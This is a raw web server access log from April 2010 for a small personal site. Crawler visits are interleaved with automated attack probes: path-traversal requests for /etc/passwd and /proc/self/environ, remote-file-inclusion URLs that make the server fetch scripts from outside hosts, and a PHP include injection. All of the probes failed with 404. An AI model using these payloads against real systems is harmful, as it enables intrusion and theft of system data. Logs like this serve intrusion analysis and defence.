93.93.203.175 - - [27/Apr/2010:03:58:00 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
93.93.203.175 - - [27/Apr/2010:03:58:01 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
93.93.203.175 - - [27/Apr/2010:03:58:02 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
93.93.203.175 - - [27/Apr/2010:03:58:05 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
211.174.185.131 - - [27/Apr/2010:04:04:38 -0500] "GET /logs/access_log.1220054400/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_%20%20%20path=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 384 "-""Mozilla/5.0"
211.174.185.131 - - [27/Apr/2010:04:04:38 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_%20%20%20path=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 357 "-""Mozilla/5.0"
211.174.185.131 - - [27/Apr/2010:04:04:38 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_%20%20%20path=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.174.185.131 - - [27/Apr/2010:04:04:41 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_%20%20%20path=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 357 "-""Mozilla/5.0"
211.174.185.131 - - [27/Apr/2010:04:04:41 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_%20%20%20path=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.174.185.131 - - [27/Apr/2010:04:04:41 -0500] "GET /logs/access_log.1220054400/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_%20%20%20path=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 384 "-""Mozilla/5.0"
211.174.185.131 - - [27/Apr/2010:04:13:53 -0500] "GET /logs/access_log.1220054400%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_%20%20%20path=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 386 "-""Mozilla/5.0"
113.52.152.6 - - [27/Apr/2010:04:15:10 -0500] "GET /logs/access_log.1270598400/template.php?content=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.805"
113.52.152.6 - - [27/Apr/2010:04:15:11 -0500] "GET /logs/access_log.1270598400/template.php?content=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 323 "-""libwww-perl/5.805"
113.52.152.6 - - [27/Apr/2010:04:15:11 -0500] "GET /template.php?content=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.805"
113.52.152.6 - - [27/Apr/2010:04:15:12 -0500] "GET /template.php?content=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""libwww-perl/5.805"
113.52.152.6 - - [27/Apr/2010:04:15:12 -0500] "GET /logs/template.php?content=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.805"
113.52.152.6 - - [27/Apr/2010:04:15:13 -0500] "GET /logs/template.php?content=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-""libwww-perl/5.805"
207.46.13.40 - - [27/Apr/2010:04:15:24 -0500] "GET /logs/access_log.1207008000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.174.185.131 - - [27/Apr/2010:04:15:28 -0500] "GET /logs/access_log.1220054400%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_%20%20%20path=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 386 "-""Mozilla/5.0"
123.143.98.5 - - [27/Apr/2010:04:27:34 -0500] "GET //setup.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
123.143.98.5 - - [27/Apr/2010:04:27:34 -0500] "GET /logs/access_log.1265241600//setup.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
123.143.98.5 - - [27/Apr/2010:04:27:34 -0500] "GET /logs//setup.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
207.46.204.240 - - [27/Apr/2010:04:30:25 -0500] "GET /artwork/miscellaneous.htm HTTP/1.1" 404 309 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.80.248.8 - - [27/Apr/2010:04:32:02 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.lt/search?hl=lt&q=related:www.glamourimages.net/guests/vflashidx.html+retro+nylon+fetish&start=10&sa=N""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
62.80.248.8 - - [27/Apr/2010:04:32:02 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
207.46.13.41 - - [27/Apr/2010:04:33:54 -0500] "GET /logs/access_log.1165536000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.21.79.214 - - [27/Apr/2010:04:36:14 -0500] "GET //index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
123.143.98.5 - - [27/Apr/2010:04:38:02 -0500] "GET //ask_password.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
123.143.98.5 - - [27/Apr/2010:04:38:02 -0500] "GET /logs//ask_password.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
123.143.98.5 - - [27/Apr/2010:04:38:02 -0500] "GET /logs/access_log.1265241600//ask_password.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
123.143.98.5 - - [27/Apr/2010:04:38:35 -0500] "GET /logs/access_log.1266710400//ask_password.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
66.98.216.61 - - [27/Apr/2010:04:39:20 -0500] "GET /index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
81.21.79.214 - - [27/Apr/2010:04:41:27 -0500] "GET //index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
81.21.79.214 - - [27/Apr/2010:04:44:23 -0500] "GET /logs/access_log.1212969600//index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
81.21.79.214 - - [27/Apr/2010:04:44:23 -0500] "GET //index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
81.21.79.214 - - [27/Apr/2010:04:44:23 -0500] "GET /logs//index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
207.46.204.179 - - [27/Apr/2010:04:45:55 -0500] "GET /logs/access_log.1207699200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.21.79.214 - - [27/Apr/2010:04:49:37 -0500] "GET /logs/access_log.1212969600//index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
81.21.79.214 - - [27/Apr/2010:04:49:38 -0500] "GET //index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
81.21.79.214 - - [27/Apr/2010:04:49:38 -0500] "GET /logs//index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
66.249.71.36 - - [27/Apr/2010:04:51:46 -0500] "GET /logs/access_log.1266537600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.195.112.180 - - [27/Apr/2010:04:52:15 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.106.229 - - [27/Apr/2010:04:53:18 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.93.147.154 - - [27/Apr/2010:04:54:22 -0500] "GET /logs//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
200.93.147.154 - - [27/Apr/2010:04:54:22 -0500] "GET //index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.21.79.214 - - [27/Apr/2010:04:56:14 -0500] "GET /logs/access_log.1220054400//index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
206.123.118.228 - - [27/Apr/2010:04:56:28 -0500] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 338 "-""libwww-perl/5.810"
206.123.118.228 - - [27/Apr/2010:04:56:28 -0500] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 333 "-""libwww-perl/5.810"
206.123.118.228 - - [27/Apr/2010:04:56:34 -0500] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 338 "-""libwww-perl/5.810"
206.123.118.228 - - [27/Apr/2010:04:56:34 -0500] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 333 "-""libwww-perl/5.810"
207.46.204.178 - - [27/Apr/2010:04:56:55 -0500] "GET /logs/access_log.1223164800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.177 - - [27/Apr/2010:04:57:00 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [27/Apr/2010:04:59:41 -0500] "GET /costume/thmb3.htm HTTP/1.0" 200 3450 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.21.79.214 - - [27/Apr/2010:05:00:57 -0500] "GET /logs/access_log.1220054400//index.php?option=com_facileforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
206.123.118.228 - - [27/Apr/2010:05:09:36 -0500] "GET //index.php?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
206.123.118.228 - - [27/Apr/2010:05:09:37 -0500] "GET //index.php?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
207.46.204.180 - - [27/Apr/2010:05:12:24 -0500] "GET /logs/access_log.1231718400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.94 - - [27/Apr/2010:05:19:25 -0500] "GET /logs/access_log.1182556800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.174.185.131 - - [27/Apr/2010:05:20:04 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 304 "-""Mozilla/5.0"
211.174.185.131 - - [27/Apr/2010:05:20:04 -0500] "GET /logs/access_log.1220054400%20%20/akocomments.php?mosConfig_absolute_path=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.174.185.131 - - [27/Apr/2010:05:20:04 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.174.185.131 - - [27/Apr/2010:05:21:24 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.174.185.131 - - [27/Apr/2010:05:21:24 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 304 "-""Mozilla/5.0"
211.174.185.131 - - [27/Apr/2010:05:21:24 -0500] "GET /logs/access_log.1220054400%20%20/akocomments.php?mosConfig_absolute_path=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
206.123.118.228 - - [27/Apr/2010:05:23:04 -0500] "GET /logs/access_log.1270598400//index.php?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
206.123.118.228 - - [27/Apr/2010:05:23:04 -0500] "GET /logs/access_log.1270598400//index.php?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
206.123.118.228 - - [27/Apr/2010:05:23:04 -0500] "GET //index.php?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
206.123.118.228 - - [27/Apr/2010:05:23:04 -0500] "GET //index.php?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
206.123.118.228 - - [27/Apr/2010:05:23:04 -0500] "GET /logs//index.php?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
206.123.118.228 - - [27/Apr/2010:05:23:04 -0500] "GET /logs//index.php?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
209.216.43.133 - - [27/Apr/2010:05:26:27 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:05:26:27 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:05:26:28 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
66.249.71.36 - - [27/Apr/2010:05:27:14 -0500] "GET /costume/?iframe=true&width=100%&height=100% HTTP/1.1" 200 640 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.216.43.133 - - [27/Apr/2010:05:28:02 -0500] "GET /logs/access_log.1263168000//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:05:28:02 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
209.216.43.133 - - [27/Apr/2010:05:28:02 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
207.46.199.49 - - [27/Apr/2010:05:29:25 -0500] "GET /logs/access_log.1158537600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
206.123.118.228 - - [27/Apr/2010:05:32:51 -0500] "GET /logs/access_log.1267574400//index.php?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
206.123.118.228 - - [27/Apr/2010:05:32:54 -0500] "GET /logs/access_log.1267574400//index.php?option=com_fabrik&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
207.46.204.178 - - [27/Apr/2010:05:33:24 -0500] "GET /logs/access_log.1166745600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.134 - - [27/Apr/2010:05:33:24 -0500] "GET /logs/access_log.1161734400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.44 - - [27/Apr/2010:05:37:54 -0500] "GET /logs/access_log.1253404800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.98.216.61 - - [27/Apr/2010:05:40:51 -0500] "GET /logs/access_log.1217548800%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hhse.biz/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
66.98.216.61 - - [27/Apr/2010:05:40:51 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hhse.biz/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
66.98.216.61 - - [27/Apr/2010:05:40:52 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hhse.biz/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
66.98.216.61 - - [27/Apr/2010:05:40:53 -0500] "GET /logs/access_log.1217462400%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hhse.biz/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
207.46.13.144 - - [27/Apr/2010:05:46:54 -0500] "GET /logs/access_log.1173744000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.126.254.139 - - [27/Apr/2010:06:01:44 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.126.254.139 - - [27/Apr/2010:06:01:44 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.126.254.139 - - [27/Apr/2010:06:01:44 -0500] "GET /logs/access_log.1268870400//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.126.254.139 - - [27/Apr/2010:06:02:50 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.126.254.139 - - [27/Apr/2010:06:02:50 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.126.254.139 - - [27/Apr/2010:06:02:50 -0500] "GET /logs/access_log.1261785600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.126.254.139 - - [27/Apr/2010:06:03:44 -0500] "GET /logs/access_log.1265760000//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.126.254.139 - - [27/Apr/2010:06:03:53 -0500] "GET /logs/access_log.1261785600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.126.254.139 - - [27/Apr/2010:06:04:15 -0500] "GET /logs/access_log.1225238400//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.126.254.139 - - [27/Apr/2010:06:04:50 -0500] "GET /logs/access_log.1265760000//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.126.254.139 - - [27/Apr/2010:06:06:52 -0500] "GET /logs/access_log.1225238400//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.241.24.100 - - [27/Apr/2010:06:10:56 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.241.24.100 - - [27/Apr/2010:06:10:56 -0500] "GET /logs/access_log.1261785600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.241.24.100 - - [27/Apr/2010:06:10:56 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 299 "-""Mozilla/5.0"
72.30.161.241 - - [27/Apr/2010:06:11:06 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.241 - - [27/Apr/2010:06:11:06 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
88.165.81.34 - - [27/Apr/2010:06:12:06 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 299 "-""Mozilla/5.0"
88.165.81.34 - - [27/Apr/2010:06:12:06 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 294 "-""Mozilla/5.0"
88.165.81.34 - - [27/Apr/2010:06:12:06 -0500] "GET /logs/access_log.1261785600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.241.24.100 - - [27/Apr/2010:06:13:58 -0500] "GET /logs/access_log.1265760000//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.241.24.100 - - [27/Apr/2010:06:13:58 -0500] "GET /logs/access_log.1225238400//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.165.81.34 - - [27/Apr/2010:06:14:48 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 299 "-""Mozilla/5.0"
88.165.81.34 - - [27/Apr/2010:06:14:48 -0500] "GET /logs/access_log.1265760000//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.165.81.34 - - [27/Apr/2010:06:14:48 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 294 "-""Mozilla/5.0"
213.202.242.101 - - [27/Apr/2010:06:16:10 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
213.202.242.101 - - [27/Apr/2010:06:16:11 -0500] "GET /logs/access_log.1219363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
213.202.242.101 - - [27/Apr/2010:06:16:11 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
88.165.81.34 - - [27/Apr/2010:06:17:04 -0500] "GET /logs/access_log.1225238400//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.13.93 - - [27/Apr/2010:06:17:25 -0500] "GET /logs/access_log.1194393600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.43 - - [27/Apr/2010:06:18:56 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
213.202.242.101 - - [27/Apr/2010:06:21:48 -0500] "GET /logs/access_log.1219708800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
213.202.242.101 - - [27/Apr/2010:06:24:25 -0500] "GET /logs/access_log.1220054400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.165.81.34 - - [27/Apr/2010:06:26:59 -0500] "GET /logs/access_log.1265760000//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.165.81.34 - - [27/Apr/2010:06:27:40 -0500] "GET /logs/access_log.1225238400//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.129.119.43 - - [27/Apr/2010:06:28:30 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
81.21.79.214 - - [27/Apr/2010:06:37:29 -0500] "GET /logs/index.php?option=com_mospray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
